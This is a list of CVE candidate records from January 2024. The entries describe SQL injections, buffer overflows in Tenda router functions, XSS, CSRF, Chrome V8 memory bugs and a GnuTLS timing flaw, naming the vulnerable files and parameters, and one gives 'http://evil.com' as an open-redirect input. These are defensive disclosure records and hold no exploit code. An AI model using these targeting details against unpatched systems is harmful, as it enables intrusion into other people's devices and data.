CVE 2024 556 Candidate A Weak Cryptography for Passwords vulnerability has been detected on WIC200 affecting version 1.1. This vulnerability allows a remote user to intercept the traffic and retrieve the credentials from another user and decode it in base64 allowing the attacker to see the credentials in plain text. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200 | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200 Assigned (20240115)
CVE 2024 555 Candidate A Cross-Site Request Forgery (CSRF) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could lead another user into executing unwanted actions inside the application they are logged in. This vulnerability is possible due to the lack of propper CSRF token implementation. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200 | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200 Assigned (20240115)
CVE 2024 554 Candidate A Cross-site scripting (XSS) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could store a malicious javascript payload in the device model parameter via '/setup/diags_ir_learn.asp', allowing the attacker to retrieve the session details of another user. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200 | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200 Assigned (20240115)
CVE 2024 553 Candidate A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from the response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981. MISC:RHBZ#2258412 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258412 | MISC:RHSA-2024:0533 | URL:https://access.redhat.com/errata/RHSA-2024:0533 | MISC:RHSA-2024:0627 | URL:https://access.redhat.com/errata/RHSA-2024:0627 | MISC:RHSA-2024:0796 | URL:https://access.redhat.com/errata/RHSA-2024:0796 | MISC:RHSA-2024:1082 | URL:https://access.redhat.com/errata/RHSA-2024:1082 | MISC:RHSA-2024:1108 | URL:https://access.redhat.com/errata/RHSA-2024:1108 | MISC:http://www.openwall.com/lists/oss-security/2024/01/19/3 | URL:http://www.openwall.com/lists/oss-security/2024/01/19/3 | MISC:https://access.redhat.com/security/cve/CVE-2024-0553 | URL:https://access.redhat.com/security/cve/CVE-2024-0553 | MISC:https://gitlab.com/gnutls/gnutls/-/issues/1522 | URL:https://gitlab.com/gnutls/gnutls/-/issues/1522 | MISC:https://lists.debian.org/debian-lts-announce/2024/02/msg00010.html | URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00010.html | MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/ | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/ | MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/ | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/ | MISC:https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html | URL:https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html | MISC:https://security.netapp.com/advisory/ntap-20240202-0011/ | URL:https://security.netapp.com/advisory/ntap-20240202-0011/ Assigned (20240115)
CVE 2024 552 Candidate Intumit inc. SmartRobot's web framwork has a remote code execution vulnerability. An unauthorized remote attacker can exploit this vulnerability to execute arbitrary commands on the remote server. MISC:https://www.twcert.org.tw/tw/cp-132-7662-41d50-1.html | URL:https://www.twcert.org.tw/tw/cp-132-7662-41d50-1.html Assigned (20240115)
CVE 2024 551 Candidate Enable exports of the database and associated exported information of the system via the default user role. The attacked would have to have been granted access to the system prior to the attack. It is worth noting that the deterministic nature of the export name is lower risk as the UI for exporting would start the download at the same time, which once downloaded - deletes the export from the system. The endpoint for exporting should simply be patched to a higher privilege level. MISC:https://github.com/mintplex-labs/anything-llm/commit/7aaa4b38e7112a6cd879c1238310c56b1844c6d8 | URL:https://github.com/mintplex-labs/anything-llm/commit/7aaa4b38e7112a6cd879c1238310c56b1844c6d8 | MISC:https://huntr.com/bounties/f114c787-ab5f-4f83-afa5-c000435efb78 | URL:https://huntr.com/bounties/f114c787-ab5f-4f83-afa5-c000435efb78 Assigned (20240115)
CVE 2024 550 Candidate A user who is privileged already `manager` or `admin` can set their profile picture via the frontend API using a relative filepath to then user the PFP GET API to download any valid files. The attacker would have to have been granted privileged permissions to the system before executing this attack. MISC:https://github.com/mintplex-labs/anything-llm/commit/e1dcd5ded010b03abd6aa32d1bf0668a48e38e17 | URL:https://github.com/mintplex-labs/anything-llm/commit/e1dcd5ded010b03abd6aa32d1bf0668a48e38e17 | MISC:https://huntr.com/bounties/c6afeb5e-f211-4b3d-aa4b-6bad734217a6 | URL:https://huntr.com/bounties/c6afeb5e-f211-4b3d-aa4b-6bad734217a6 Assigned (20240115)
CVE 2024 548 Candidate A vulnerability was found in FreeFloat FTP Server 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the component SIZE Command Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250718 is the identifier assigned to this vulnerability. MISC:https://packetstormsecurity.com/files/163038/FreeFloat-FTP-Server-1.0-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/163038/FreeFloat-FTP-Server-1.0-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.250718 | URL:https://vuldb.com/?ctiid.250718 | MISC:https://vuldb.com/?id.250718 | URL:https://vuldb.com/?id.250718 Assigned (20240114)
CVE 2024 547 Candidate A vulnerability has been found in Ability FTP Server 2.34 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component APPE Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250717 was assigned to this vulnerability. MISC:https://packetstormsecurity.com/files/163079/Ability-FTP-Server-2.34-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/163079/Ability-FTP-Server-2.34-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.250717 | URL:https://vuldb.com/?ctiid.250717 | MISC:https://vuldb.com/?id.250717 | URL:https://vuldb.com/?id.250717 Assigned (20240114)
CVE 2024 546 Candidate A vulnerability, which was classified as problematic, has been found in EasyFTP 1.7.0. This issue affects some unknown processing of the component LIST Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250715. MISC:https://packetstormsecurity.com/files/94905/EasyFTP-1.7.0.x-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/94905/EasyFTP-1.7.0.x-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.250715 | URL:https://vuldb.com/?ctiid.250715 | MISC:https://vuldb.com/?id.250715 | URL:https://vuldb.com/?id.250715 Assigned (20240114)
CVE 2024 545 Candidate A vulnerability classified as problematic was found in CodeCanyon RISE Rise Ultimate Project Manager 3.5.3. This vulnerability affects unknown code of the file /index.php/signin. The manipulation of the argument redirect with the input http://evil.com leads to open redirect. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250714 is the identifier assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.250714 | URL:https://vuldb.com/?ctiid.250714 | MISC:https://vuldb.com/?id.250714 | URL:https://vuldb.com/?id.250714 Assigned (20240114)
CVE 2024 543 Candidate A vulnerability classified as critical has been found in CodeAstro Real Estate Management System up to 1.0. This affects an unknown part of the file propertydetail.php. The manipulation of the argument pid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250713 was assigned to this vulnerability. MISC:https://drive.google.com/drive/folders/1U2nirIi6OtuCi-vrD2-VHyJbsHK5yA7t?usp=sharing | URL:https://drive.google.com/drive/folders/1U2nirIi6OtuCi-vrD2-VHyJbsHK5yA7t?usp=sharing | MISC:https://vuldb.com/?ctiid.250713 | URL:https://vuldb.com/?ctiid.250713 | MISC:https://vuldb.com/?id.250713 | URL:https://vuldb.com/?id.250713 Assigned (20240114)
CVE 2024 542 Candidate A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been rated as critical. Affected by this issue is the function formWifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250712. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/7/README.md | URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/7/README.md | MISC:https://vuldb.com/?ctiid.250712 | URL:https://vuldb.com/?ctiid.250712 | MISC:https://vuldb.com/?id.250712 | URL:https://vuldb.com/?id.250712 Assigned (20240114)
CVE 2024 541 Candidate A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been declared as critical. Affected by this vulnerability is the function formAddSysLogRule of the component httpd. The manipulation of the argument sysRulenEn leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250711. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/6/README.md | URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/6/README.md | MISC:https://vuldb.com/?ctiid.250711 | URL:https://vuldb.com/?ctiid.250711 | MISC:https://vuldb.com/?id.250711 | URL:https://vuldb.com/?id.250711 Assigned (20240114)
CVE 2024 540 Candidate A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been classified as critical. Affected is the function formOfflineSet of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250710 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/5/README.md | URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/5/README.md | MISC:https://vuldb.com/?ctiid.250710 | URL:https://vuldb.com/?ctiid.250710 | MISC:https://vuldb.com/?id.250710 | URL:https://vuldb.com/?id.250710 Assigned (20240114)
CVE 2024 539 Candidate A vulnerability was found in Tenda W9 1.0.0.7(4456) and classified as critical. This issue affects the function formQosManage_user of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250709 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/4/README.md | URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/4/README.md | MISC:https://vuldb.com/?ctiid.250709 | URL:https://vuldb.com/?ctiid.250709 | MISC:https://vuldb.com/?id.250709 | URL:https://vuldb.com/?id.250709 Assigned (20240114)
CVE 2024 538 Candidate A vulnerability has been found in Tenda W9 1.0.0.7(4456) and classified as critical. This vulnerability affects the function formQosManage_auto of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/3/README.md | URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/3/README.md | MISC:https://vuldb.com/?ctiid.250708 | URL:https://vuldb.com/?ctiid.250708 | MISC:https://vuldb.com/?id.250708 | URL:https://vuldb.com/?id.250708 Assigned (20240114)
CVE 2024 537 Candidate A vulnerability, which was classified as critical, was found in Tenda W9 1.0.0.7(4456). This affects the function setWrlBasicInfo of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250707. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/2/README.md | URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/2/README.md | MISC:https://vuldb.com/?ctiid.250707 | URL:https://vuldb.com/?ctiid.250707 | MISC:https://vuldb.com/?id.250707 | URL:https://vuldb.com/?id.250707 Assigned (20240114)
CVE 2024 536 Candidate A vulnerability, which was classified as critical, has been found in Tenda W9 1.0.0.7(4456). Affected by this issue is the function setWrlAccessList of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250706 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/1/README.md | URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/1/README.md | MISC:https://vuldb.com/?ctiid.250706 | URL:https://vuldb.com/?ctiid.250706 | MISC:https://vuldb.com/?id.250706 | URL:https://vuldb.com/?id.250706 Assigned (20240114)
CVE 2024 535 Candidate A vulnerability classified as critical was found in Tenda PA6 1.0.1.21. Affected by this vulnerability is the function cgiPortMapAdd of the file /portmap of the component httpd. The manipulation of the argument groupName leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250705 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/PA6/2/README.md | URL:https://github.com/jylsec/vuldb/blob/main/Tenda/PA6/2/README.md | MISC:https://vuldb.com/?ctiid.250705 | URL:https://vuldb.com/?ctiid.250705 | MISC:https://vuldb.com/?id.250705 | URL:https://vuldb.com/?id.250705 Assigned (20240114)
CVE 2024 534 Candidate A vulnerability classified as critical has been found in Tenda A15 15.13.07.13. Affected is an unknown function of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument mac leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250704. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.mac.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.mac.md | MISC:https://vuldb.com/?ctiid.250704 | URL:https://vuldb.com/?ctiid.250704 | MISC:https://vuldb.com/?id.250704 | URL:https://vuldb.com/?id.250704 Assigned (20240114)
CVE 2024 533 Candidate A vulnerability was found in Tenda A15 15.13.07.13. It has been rated as critical. This issue affects some unknown processing of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250703. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.devname.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.devname.md | MISC:https://vuldb.com/?ctiid.250703 | URL:https://vuldb.com/?ctiid.250703 | MISC:https://vuldb.com/?id.250703 | URL:https://vuldb.com/?id.250703 Assigned (20240114)
CVE 2024 532 Candidate A vulnerability was found in Tenda A15 15.13.07.13. It has been declared as critical. This vulnerability affects unknown code of the file /goform/WifiExtraSet of the component Web-based Management Interface. The manipulation of the argument wpapsk_crypto2_4g leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250702 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/WifExtraSet.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/WifExtraSet.md | MISC:https://vuldb.com/?ctiid.250702 | URL:https://vuldb.com/?ctiid.250702 | MISC:https://vuldb.com/?id.250702 | URL:https://vuldb.com/?id.250702 Assigned (20240114)
CVE 2024 531 Candidate A vulnerability was found in Tenda A15 15.13.07.13. It has been classified as critical. This affects an unknown part of the file /goform/setBlackRule of the component Web-based Management Interface. The manipulation of the argument deviceList leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250701 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/setBlackRule.md | URL:https://github.com/yaoyue123/iot/blob/main/Tenda/A15/setBlackRule.md | MISC:https://vuldb.com/?ctiid.250701 | URL:https://vuldb.com/?ctiid.250701 | MISC:https://vuldb.com/?id.250701 | URL:https://vuldb.com/?id.250701 Assigned (20240114)
CVE 2024 530 Candidate A vulnerability was found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /apps/reg_go.php of the component HTTP POST Request Handler. The manipulation of the argument username_reg leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250700. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/HUxa372VNwad | URL:https://note.zhaoj.in/share/HUxa372VNwad | MISC:https://vuldb.com/?ctiid.250700 | URL:https://vuldb.com/?ctiid.250700 | MISC:https://vuldb.com/?id.250700 | URL:https://vuldb.com/?id.250700 Assigned (20240114)
CVE 2024 529 Candidate A vulnerability has been found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /apps/login_auth.php of the component HTTP POST Request Handler. The manipulation of the argument username_login leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250699. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/neURUa2NSxzd | URL:https://note.zhaoj.in/share/neURUa2NSxzd | MISC:https://vuldb.com/?ctiid.250699 | URL:https://vuldb.com/?ctiid.250699 | MISC:https://vuldb.com/?id.250699 | URL:https://vuldb.com/?id.250699 Assigned (20240114)
CVE 2024 528 Candidate A vulnerability, which was classified as critical, was found in CXBSoft Post-Office 1.0. Affected is an unknown function of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250698 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/grOgvdMgn0wg | URL:https://note.zhaoj.in/share/grOgvdMgn0wg | MISC:https://vuldb.com/?ctiid.250698 | URL:https://vuldb.com/?ctiid.250698 | MISC:https://vuldb.com/?id.250698 | URL:https://vuldb.com/?id.250698 Assigned (20240114)
CVE 2024 527 Candidate A vulnerability, which was classified as critical, has been found in CXBSoft Url-shorting up to 1.3.1. This issue affects some unknown processing of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250697 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/6bz65C2dfgUk | URL:https://note.zhaoj.in/share/6bz65C2dfgUk | MISC:https://vuldb.com/?ctiid.250697 | URL:https://vuldb.com/?ctiid.250697 | MISC:https://vuldb.com/?id.250697 | URL:https://vuldb.com/?id.250697 Assigned (20240114)
CVE 2024 526 Candidate A vulnerability classified as critical was found in CXBSoft Url-shorting up to 1.3.1. This vulnerability affects unknown code of the file /pages/short_to_long.php of the component HTTP POST Request Handler. The manipulation of the argument shorturl leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250696. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/Zezf8fmoq7lk | URL:https://note.zhaoj.in/share/Zezf8fmoq7lk | MISC:https://vuldb.com/?ctiid.250696 | URL:https://vuldb.com/?ctiid.250696 | MISC:https://vuldb.com/?id.250696 | URL:https://vuldb.com/?id.250696 Assigned (20240114)
CVE 2024 525 Candidate A vulnerability classified as critical has been found in CXBSoft Url-shorting up to 1.3.1. This affects an unknown part of the file /pages/long_s_short.php of the component HTTP POST Request Handler. The manipulation of the argument longurl leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250695. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/9tjcunCPidgI | URL:https://note.zhaoj.in/share/9tjcunCPidgI | MISC:https://vuldb.com/?ctiid.250695 | URL:https://vuldb.com/?ctiid.250695 | MISC:https://vuldb.com/?id.250695 | URL:https://vuldb.com/?id.250695 Assigned (20240114)
CVE 2024 524 Candidate A vulnerability was found in CXBSoft Url-shorting up to 1.3.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php. The manipulation of the argument url leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250694 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/GdpwiaItePFq | URL:https://note.zhaoj.in/share/GdpwiaItePFq | MISC:https://vuldb.com/?ctiid.250694 | URL:https://vuldb.com/?ctiid.250694 | MISC:https://vuldb.com/?id.250694 | URL:https://vuldb.com/?id.250694 Assigned (20240114)
CVE 2024 523 Candidate A vulnerability was found in CmsEasy up to 7.7.7. It has been declared as critical. Affected by this vulnerability is the function getslide_child_action in the library lib/admin/language_admin.php. The manipulation of the argument sid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250693 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/V3geD4g/cmseasy_vul/blob/main/SQL1-EN.md | URL:https://github.com/V3geD4g/cmseasy_vul/blob/main/SQL1-EN.md | MISC:https://vuldb.com/?ctiid.250693 | URL:https://vuldb.com/?ctiid.250693 | MISC:https://vuldb.com/?id.250693 | URL:https://vuldb.com/?id.250693 Assigned (20240114)
CVE 2024 522 Candidate A vulnerability was found in Allegro RomPager 4.01. It has been classified as problematic. Affected is an unknown function of the file usertable.htm?action=delete of the component HTTP POST Request Handler. The manipulation of the argument username leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 4.30 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250692. NOTE: The vendor explains that this is a very old issue that got fixed 20 years ago but without a public disclosure. MISC:https://vuldb.com/?ctiid.250692 | URL:https://vuldb.com/?ctiid.250692 | MISC:https://vuldb.com/?id.250692 | URL:https://vuldb.com/?id.250692 Assigned (20240114)
CVE 2024 521 Candidate Code Injection in paddlepaddle/paddle MISC:https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453 | URL:https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453 Assigned (20240114)
CVE 2024 519 Candidate Out of bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-049f068a8c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/ | FEDORA:FEDORA-2024-44b1f656a3 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html | MISC:https://crbug.com/1517354 | URL:https://crbug.com/1517354 Assigned (20240112)
CVE 2024 518 Candidate Type confusion in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-049f068a8c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/ | FEDORA:FEDORA-2024-44b1f656a3 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html | MISC:https://crbug.com/1507412 | URL:https://crbug.com/1507412 Assigned (20240112)
CVE 2024 517 Candidate Out of bounds write in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-049f068a8c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/ | FEDORA:FEDORA-2024-44b1f656a3 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html | MISC:https://crbug.com/1515930 | URL:https://crbug.com/1515930 Assigned (20240112)
CVE 2024 516 Candidate The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to unauthorized post metadata update due to a missing capability check on the wpr_update_form_action_meta function in all versions up to, and including, 1.3.87. This makes it possible for unauthenticated attackers to update certain metadata. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve Assigned (20240112)
CVE 2024 515 Candidate The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the remove_from_compare function. This makes it possible for unauthenticated attackers to remove items from user compare lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve Assigned (20240112)
CVE 2024 514 Candidate The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the add_to_compare function. This makes it possible for unauthenticated attackers to add items to user compare lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve Assigned (20240112)
CVE 2024 513 Candidate The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the remove_from_wishlist function. This makes it possible for unauthenticated attackers to remove items from user wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve Assigned (20240112)
